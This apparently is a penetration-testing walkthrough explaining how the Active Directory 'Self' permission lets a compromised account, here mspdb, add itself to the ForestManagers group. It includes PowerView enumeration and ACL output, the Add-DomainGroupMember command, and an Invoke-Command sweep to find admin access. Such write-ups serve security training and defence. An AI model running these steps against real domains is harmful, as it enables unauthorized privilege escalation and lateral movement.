Self Exploit

What is the Self Permission For?

The self permission provides the ability to perform validated writes - The right to perform an operation that is controlled by a validated write access right. Validated writes include the following attributes:
  • Self-Membership(bf9679c0-0de6-11d0-a285-00aa003049e2 / member attribute)
  • Validated-DNS-Host-Name (72e39547-7b18-11d1-adef-00c04fd8d5cd / dNSHostName attribute)
  • Validated-MS-DS-Additional-DNS-Host-Name (80863791-dbe9-4eb8-837e-7f0ab55d9ac7 / msDS-AdditionalDnsHostName attribute)
  • Validated-MS-DS-Behavior-Version (d31a8757-2447-4545-8081-3bb610cacbf2 / msDS-Behavior-Version attribute)
  • Validated-SPN (f3a64788-5306-11d1-a9c5-0000f80367c1 / servicePrincipalName attribute)

How can this be abused?

The Self permission can be abused by an attacker to allow them to add themselves as a member of a group.

Scenario:

You have managed to compromise an account belonging to mspdb, who is a member of the msp.local domain. Running Bloodhound identified that there were was no direct access from the mspdb account to anywhere else on the network. Issuing the following PowerView commands identified that mspdb had the self permission over the ForestManagers group, which is a group on the internal.msp.local domain.

Get SID of MSPDB Account

Get-NetUser -Identity mspdb -domain msp.local
logoncount : 144
badpasswordtime : 10/6/2020 5:03:46 AM
distinguishedname : CN=mspdb,CN=Users,DC=msp,DC=local
objectclass : {top, person, organizationalPerson, user}
displayname : msp db
lastlogontimestamp : 1/9/2021 9:27:09 PM
userprincipalname : mspdb
name : mspdb
objectsid : S-1-5-21-2998733414-582960673-4099777928-1107
samaccountname : mspdb
codepage : 0
samaccounttype : USER_OBJECT
accountexpires : NEVER
countrycode : 0
whenchanged : 1/10/2021 5:27:09 AM
instancetype : 4
usncreated : 63471
objectguid : 9158587d-8b16-4b38-a013-0bfd1f2a5aaf
sn : db
lastlogoff : 12/31/1600 4:00:00 PM
objectcategory : CN=Person,CN=Schema,CN=Configuration,DC=msp,DC=local
dscorepropagationdata : {5/30/2019 11:42:37 AM, 1/1/1601 12:00:00 AM}
serviceprincipalname : MSSQLSvc/msp-sqlreport.msp.local
givenname : msp
lastlogon : 1/10/2021 1:38:13 AM
badpwdcount : 0
cn : mspdb
useraccountcontrol : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD
whencreated : 5/30/2019 11:42:36 AM
primarygroupid : 513
pwdlastset : 5/30/2019 4:42:37 AM
usnchanged : 1338942

Query for any ACL's that are affected by this user

Get-ObjectAcl -Domain internal.msp.local | Where-Object {$_.SecurityIdentifier -eq 'S-1-5-21-2998733414-582960673-40997
77928-1107'}
ObjectDN : CN=ForestManagers,CN=Users,DC=internal,DC=msp,DC=local
ObjectSID : S-1-5-21-2754435719-1041067879-922430489-1118
ActiveDirectoryRights : Self
ObjectAceFlags : ObjectAceTypePresent
ObjectAceType : bf9679c0-0de6-11d0-a285-00aa003049e2
InheritedObjectAceType : 00000000-0000-0000-0000-000000000000
BinaryLength : 56
AceQualifier : AccessAllowed
IsCallback : False
OpaqueLength : 0
AccessMask : 8
SecurityIdentifier : S-1-5-21-2998733414-582960673-4099777928-1107
AceType : AccessAllowedObject
AceFlags : None
IsInherited : False
InheritanceFlags : None
PropagationFlags : None
AuditFlags : None
ObjectDN : CN=ForestManagers,CN=Users,DC=internal,DC=msp,DC=local
ObjectSID : S-1-5-21-2754435719-1041067879-922430489-1118
ActiveDirectoryRights : ReadProperty, GenericExecute
BinaryLength : 36
AceQualifier : AccessAllowed
IsCallback : False
OpaqueLength : 0
AccessMask : 131092
SecurityIdentifier : S-1-5-21-2998733414-582960673-4099777928-1107
AceType : AccessAllowed
AceFlags : None
IsInherited : False
InheritanceFlags : None
PropagationFlags : None
AuditFlags : None
From the above we can see that MSPDB has the self permission over the ForestManagers group. This means that they can add themselves to that group.

Add MSPDB to the ForestManagers Group

Add-DomainGroupMember -Identity 'ForestManagers' -Members 'msp\mspdb' -Domain internal.msp.local
That user can now access any machine on the internal.msp.local domain that allow members of the ForestManagers group to have access to.

Finding Local Admin Access.

We can issue the following queries to see if we now have access to any machines on the internal.msp.local domain.
PS C:\Users\Public> $comps = Get-NetComputer -Domain internal.msp.local
PS C:\Users\Public> Invoke-Command -ScriptBlock{hostname} -Computer ($comps.dnshostName) -ErrorAction SilentlyContinue
internal-srv06
From the above we can see that our command successfully executed on machine Internal-SRV06 indicating that we have admin access. We should now be able to PS-Remote into that machine.